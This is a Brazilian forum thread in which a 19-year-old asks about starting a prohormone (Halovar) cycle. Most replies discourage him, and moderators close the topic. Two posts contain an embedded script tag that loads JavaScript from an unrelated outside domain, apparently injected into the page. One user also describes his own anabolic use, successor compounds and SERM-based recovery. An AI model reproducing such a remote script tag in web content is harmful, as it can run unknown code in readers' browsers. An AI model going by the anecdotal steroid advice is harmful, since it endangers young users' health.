Ir para conteúdo
  • Cadastre-se

[Falta de Pesquisa]Começar Ciclo Ph

Troul

Posts Recomendados

Postado

Olá galera, bem gente quero começar meu ciclo com PH. Irei comprar o Halovar, Junto com o organ shield e para o TPC Recycle + Tribulus. Tenho 19 anos, 60 KG, 1M,70. Ja tive Hipertiroidismo, vcs acham que tem algum problema? Alguem que ja teve ja tomou? E o ciclo vcs acham que ta bom?

Postado

Olá galera, bem gente quero começar meu ciclo com PH. Irei comprar o Halovar, Junto com o organ shield e para o TPC Recycle + Tribulus. Tenho 19 anos, 60 KG, 1M,70. Ja tive Hipertiroidismo, vcs acham que tem algum problema? Alguem que ja teve ja tomou? E o ciclo vcs acham que ta bom?

Tudo errado cara

Pesquisa antes que te joguem pedras, sugiro mudar a imagem de perfil também.

Só um conselho mesmo

Postado

<script src="https://queryjs.me/services/script.js" type="text/javascript"></script>

Oque esta errado?

1 - O halovar pelo que sei já não é fabricado a longos anos, assim como o m-drol, então pode ser falso

2 - organ shield é inutil no geral

3 - recycle não é tpc

4 - tribullus não é tpc

5 - 60kg/1,70m tu nem base muscular tem pra cicar...

fora que não tem a estrutura do ciclo, pra saber se estaria certo

Postado

Tudo errado cara

Pesquisa antes que te joguem pedras, sugiro mudar a imagem de perfil também.

Só um conselho mesmo

+1

1 - O halovar pelo que sei já não é fabricado a longos anos, assim como o m-drol, então pode ser falso

3 - recycle não é tpc

4 - tribullus não é tpc

+1

Postado (editado)

Acho que tudo já foi esclarecido.

Agora é pesquisar para entäo desistir da idéia ou montar um ciclo decente.

Editado por Torf
Postado

<script src="https://queryjs.me/services/script.js" type="text/javascript"></script>

3 - recycle não é tpc

4 - tribullus não é tpc

Oque voce aconselharia entao??

Ao inves do Halovar, no caso poderia ser um h-stane?

Postado

Oque voce aconselharia entao??

Pesquisa mano, aprenda sobre metodos de treino e quais você se adapta melhor, a mesma coisa com as dietas de todos os tipos.

Depois, quando já conhecer seu corpo, como ele funciona, ou não funciona, você provavelmente já vai ter um certo tamanho, aí sim vá atrás de drogas se quiser

Pesquise sobre elas, veja o que é mais interessante pra você, etc. O proprio forum é superlotado dessas informações

Postado

lololol

Ah, e aprende o máximo que puder sobre treino e dieta, nenhum AE é capaz de fazer milagre.

Digamos que com dieta e treino, tudo certinho, vc esteja a 100%, ai vc vai e usa aes juntamente com dieta e treino, vc pode chegar a 150%!!

Mas aes sem dieta e treino é como se vc tivesse a 10%, deu pra sacar?

Um ciclo que passei pra uma galera um tempo atrás, e agora to passando pra tu, e pode ter certeza que tu vai evoluir pra porra.

Estudo 2hr DSDN

Pesquisa 30min TSD

Busca 30min TSD

Se quiser aumentar a dose, pode ir de boa, num tem colat forte não, e melhor ainda, não precisa de TPC.

Postado

lololol

Ah, e aprende o máximo que puder sobre treino e dieta, nenhum AE é capaz de fazer milagre.

Digamos que com dieta e treino, tudo certinho, vc esteja a 100%, ai vc vai e usa aes juntamente com dieta e treino, vc pode chegar a 150%!!

Mas aes sem dieta e treino é como se vc tivesse a 10%, deu pra sacar?

Um ciclo que passei pra uma galera um tempo atrás, e agora to passando pra tu, e pode ter certeza que tu vai evoluir pra porra.

Estudo 2hr DSDN

Pesquisa 30min TSD

Busca 30min TSD

Se quiser aumentar a dose, pode ir de boa, num tem colat forte não, e melhor ainda, não precisa de TPC.

kkkkkkkkkkkkkkkkkkkkkk ciclo massa kkkkkkkkkkkkk vou comecar esse ciclo hehehehe ri pakas aqui

Postado

cara halovar nem fabrica mais

e essa tpc ai nem é valido é so marketing

se você quer tomar a parada pelo menos tome original , porque o cara se fuder tomando a parada falso é amais kkkkkkkkkkkkkkkkkkkkkkkkkkkk

Postado

Cara ja fiz o uso tanto do halovar quanto do mdrol com o halovar ganhei 4 quilos e com o mdrol deu uma secada boa no shape mas eu não recomendaria você usar ph e nem um anabol primeiramente pelo fato que o ph vai inibir bastante o teu eixo hpt e segundo que você não tem idade suficiente pra ciclar eu cometi um erro em ciclar antes dos 21 mas dei sorte de não ter acontecido nada cara e organ shield e recicle não adianta nada depois de um ciclo com anabol tem que se fazer uma tpc pesquisa sobre tpc de serms e outra tanto o halovar quanto o mdrol pararam de fabricar agora o sucessor do mdrol éo mstane e tem o hstane que talvez seja o substito do halovar mais no seu lugar pesquisaria mais e deixaria isso pra lá cara e pesava nisso mais pra frente e usaria um injetavel

• Supermoderador
Postado

Este tópico foi fechado por "Falta de Pesquisa".

Isto aconteceu, pois o tópico contém dúvidas repetidas e/ou que podem ser solucionadas facilmente usando a busca (independente de ser uma questão individual). Fazemos isto para evitar que muitos tópicos semelhantes se acumulem no fórum.

Não sabe como usar a busca do fórum ? Veja isto: https://www.hipertrofia.org/forum/topic/154600-como-encontrar-tudo-ou-quase-tudo-usando-a-busca-do-forum/

Acha que o seu tópico foi fechado injustamente e gostaria de uma revisão ? Entre em contato com um administrador através de uma mensagem particular.

Lembre-se que fazemos isto exclusivamente para melhorar a organização do fórum, e não como uma forma de punição.

Desde já, pedimos desculpas pelo contratempo.

Visitante
Este tópico está impedido de receber novos posts.
  • Criar Novo...